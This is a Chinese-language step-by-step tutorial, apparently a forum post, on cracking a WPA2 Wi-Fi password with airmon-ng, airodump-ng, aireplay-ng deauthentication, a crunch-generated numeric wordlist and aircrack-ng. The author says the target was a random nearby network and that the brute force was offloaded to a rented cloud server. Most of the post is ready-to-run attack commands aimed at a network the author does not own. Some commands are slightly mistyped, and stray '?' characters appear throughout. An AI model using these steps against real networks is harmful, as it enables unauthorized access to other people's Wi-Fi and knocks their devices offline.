不要對其中的命令死記硬背,先要把原理和步驟搞清楚
1. 打開WIFI,但是要斷開wifi連接,防止後面出現錯誤
2. airmon-ng? 查看支持監控(moniter)的網卡,我的是wlan0,每個人可能會不同,按妳的實際名稱來(圖1)
3. airmon-ng start wlan0? 開啟該網卡監控模式(moniter),網卡名稱變為wlan0mon,之後寫網卡名稱時不要錯寫成wlan0!我用airmon-ng命令重新確認了壹下(圖2)
4. airodump-ng wlan0mon? 使用該網卡開始掃描,顯示壹大批wifi熱點,都是WPA2 加密模式,差不多選擇完目標後可選擇Ctrl+c停止掃描(圖3)
5. airodump --bssid 該wifi的bssid --channel? 該wifi的信道 --write? 把捕獲的包放到哪裏 wlan0mon? (圖4)
例如我選擇第壹個xiaomi則輸入
airodump --bssid 34:80:B3:3C:FD:49? --channel? 6? --write? xiaomi? wlan0mon (建議先創建壹個目錄,在該目錄下運行此命令)
6. 發現連接該wifi的有壹臺設備,我們需要獲取該wifi的用戶認證包,妳可以壹直等他下次重新上線,當然我們沒那麽有耐心,於是就有了下壹個命令aireplay-ng(圖4)
7. aireplay-ng -0 3 -a? 該wifi的bssid -c 連接該wifi的用戶設備station? wlan0mon? (圖5右側)
(-0表示發送解除認證,讓該設備重新連接以獲取認證包,3表示發送3次,當該數為0時表示無限次,-a表示access point,-c表示client)
運行該命令後圖5左邊窗口出現 WPA handshake:......說明抓到了認證包,可以與圖4對比壹下。完成之後記得用 airmon-ng stop wlan0mon 關閉網卡監聽模式!
8. 此步驟為額外步驟,可不進行。
我用wireshark打開捕獲的包xiao.cap,點Protoco進行分類,確實發現了認證包
9. 有了認證包之後,我們破解還需要字典,壹般人密碼會用八位數字組成,於是我用crunch創建8位純數字組成的字典,有837MB大小,對crunch工具不了解的自行百度
crunch 8 8 -f /usr/share/crunch/charset.lst numeric -o wordlist.txt
調用密碼庫文件 charset.lst,?生成最小為8,最大為8,元素為密碼庫?charset.lst中?numeric的項目,並保存為?wordlist.txt;其中?charset.lst在kali_linux的目錄 為?/usr/share/crunch/charset.lst, -o:用於指定輸出字典文件的位置。
>想了解更多可以vim? /usr/share/crunch/charset.lst 查看所有密碼庫
10. aircrack-ng 捕獲的.cap包 -w 密碼字典
11. 額外步驟,可不進行。
因為是自己隨便找的wifi,所以用暴力破解看運氣,很耗時間,所以我幹脆把他放到租的雲服務器裏讓他自個去運行,反正現在雲服務器很便宜,用上screen命令讓其在用戶退出登陸時繼續運行(不了解screen工具的自行百度,壹個很好用的工具)
完帖,如有不足我會及時補充。
QQ:936769651